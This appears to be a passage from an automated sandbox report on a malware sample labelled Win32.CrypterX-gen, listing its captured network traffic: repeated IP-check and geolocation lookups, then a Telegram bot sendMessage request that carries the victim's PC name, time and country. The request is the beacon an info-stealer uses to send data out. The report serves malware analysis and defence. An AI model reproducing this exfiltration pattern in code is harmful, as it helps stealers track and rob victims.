Sep 26, 2024 10:33:22.451740026 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 08:33:22 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49762	132.226.8.169	80	7472	C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 10:33:23.074824095 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 10:33:23.952960014 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 08:33:23 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49745	188.114.97.3	443	7472	C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 08:33:11 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 08:33:11 UTC	681	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 08:33:11 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 4423 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=me3ttLkcdG5frh7sSznTE1mV8%2BvnMa27hNg%2Blr%2BSDICctj0%2FH3e3d8YtPv14vbyxo24xg3nBnwuL0cSw6sE87quFa%2BSg6erubZMkN0WuvMJbpcWM3SrL%2BN6N6sRqqe0FFs3kSBDn"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c91e85f6eef4291-EWR
2024-09-26 08:33:11 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 08:33:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49747	188.114.97.3	443	7472	C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 08:33:12 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-26 08:33:12 UTC	669	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 08:33:12 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 4424 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x64BCnjfvRDSa6TT9ssJytSjpyj8OptS1fzT9PhtyU9ljWTPsTbw1UgvkZRgli0iXFyNyWaUpGwlCgpIlPGTIciAoyMZOqCH3nxuLxqjsnmDq4ivIXORXTH2ZDMKErgHMCH76vZb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c91e865788b7d20-EWR
2024-09-26 08:33:12 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 08:33:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49750	188.114.97.3	443	7472	C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 08:33:14 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 08:33:15 UTC	679	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 08:33:14 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 4426 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H%2FRDFdRVLNUl3szRvkWZHBU8Iz6jPzqzxZfUF2qNWN5qQJnybZjepdhm6lIpVXos0a9zCbRJrNu2L2JzDGtTltrV1%2FtXuIpq7oleWY2cpfN3XmNAEj8%2Bl68%2FNDJk1AhRjzoHF%2Bn2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c91e8749b224340-EWR
2024-09-26 08:33:15 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 08:33:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49752	188.114.97.3	443	7472	C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 08:33:16 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 08:33:16 UTC	679	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 08:33:16 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 4428 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WFi9dxeXFxONvv%2BfgK0fjF6Wy6jbjPOrXsXhxBNn%2BLvc%2Bi5siRTKaqsYG3KmThu3n8%2FYAwq0wTQUox3PRfORJKercqnVREdWS4wFm2AqUChfK5uStnMfri9w0qJzEWh%2F7GoflzdT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c91e880cdc71a40-EWR
2024-09-26 08:33:16 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 08:33:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49754	188.114.97.3	443	7472	C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 08:33:18 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 08:33:18 UTC	677	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 08:33:18 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 4430 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kqvZUOi8Bih63Bz1XNBPWIE7eqG%2F8ML9Dv%2BaVkWkquG%2Bk3Sok1MhiLCkU1Y4SnMxAXjqDsgFMZa1kzy8ak6m0bGpM50ED1hNYnp4gLBATGfhAaYgccaEalg%2FWdc1eWVaoIu2VQGj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c91e889ae97c339-EWR
2024-09-26 08:33:18 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 08:33:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49756	188.114.97.3	443	7472	C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 08:33:19 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 08:33:20 UTC	689	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 08:33:19 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 4431 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FJ79gR%2FOoM0pSsAGL%2BKyLbPrEy9YwMQSmXboTegbDPMHScAVjKByz0Tt%2B1q2gOsn5%2Fd%2BaMEFklDpmNy5UmE%2FpzHnRJKJLek6TkiFFrg6fqHV6%2FYrlxUh9LS%2B6dx%2FtO43lYfLLPGe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c91e893a9c1c32f-EWR
2024-09-26 08:33:20 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 08:33:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49758	188.114.97.3	443	7472	C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 08:33:21 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 08:33:21 UTC	685	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 08:33:21 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 4433 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AIUEHdmgorRfaizLEuHLdcCuB%2B5QjQY%2B42aZXPRfXu1Okte6%2F1y9Wy6G%2BaGevopu40RbdDYI0oRbjBCOnalT4kA5cQk2OAiH%2Bz60I6rIqzeLsV5i1HTWamsxgJKibXMkayh%2B%2BWs%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c91e89ce955c46d-EWR
2024-09-26 08:33:21 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 08:33:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49761	188.114.97.3	443	7472	C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 08:33:22 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-26 08:33:23 UTC	681	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 08:33:23 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 4435 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iP4SQzmFFmxHUjUIDdhE5ZP04FDEs4OcNIZRUyyEnCnMVI%2BGp0SHhCsqWE71JiceUUPePv2%2BgknYwand%2BONZbKLSezxxoSMRW7w7X%2B%2Bjn%2FEDm7REG3TK3bTTSofa7zb4IBes7yQh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c91e8a6cda64211-EWR
2024-09-26 08:33:23 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 08:33:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49763	188.114.97.3	443	7472	C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 08:33:24 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-26 08:33:24 UTC	675	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 08:33:24 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 4436 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i1uYmjyVqK%2Fd09ItSsXBd06wsK0WUqz3qAN5WmOzSCdBiJjeRrrGSsZLclKvasDHUDyNRNZZFH6RHNqdULv2LAqENkfJTVyb70BZ6joNjB%2FrbxuszLpbjZmZlNUFB2Pa3DF4SN%2FV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c91e8b039cf7d08-EWR
2024-09-26 08:33:24 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 08:33:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49764	149.154.167.220	443	7472	C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 08:33:25 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20and%20Time:%2026/09/2024%20/%2021:13:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20116938%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-09-26 08:33:25 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 26 Sep 2024 08:33:25 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-26 08:33:25 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	04:33:04
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe
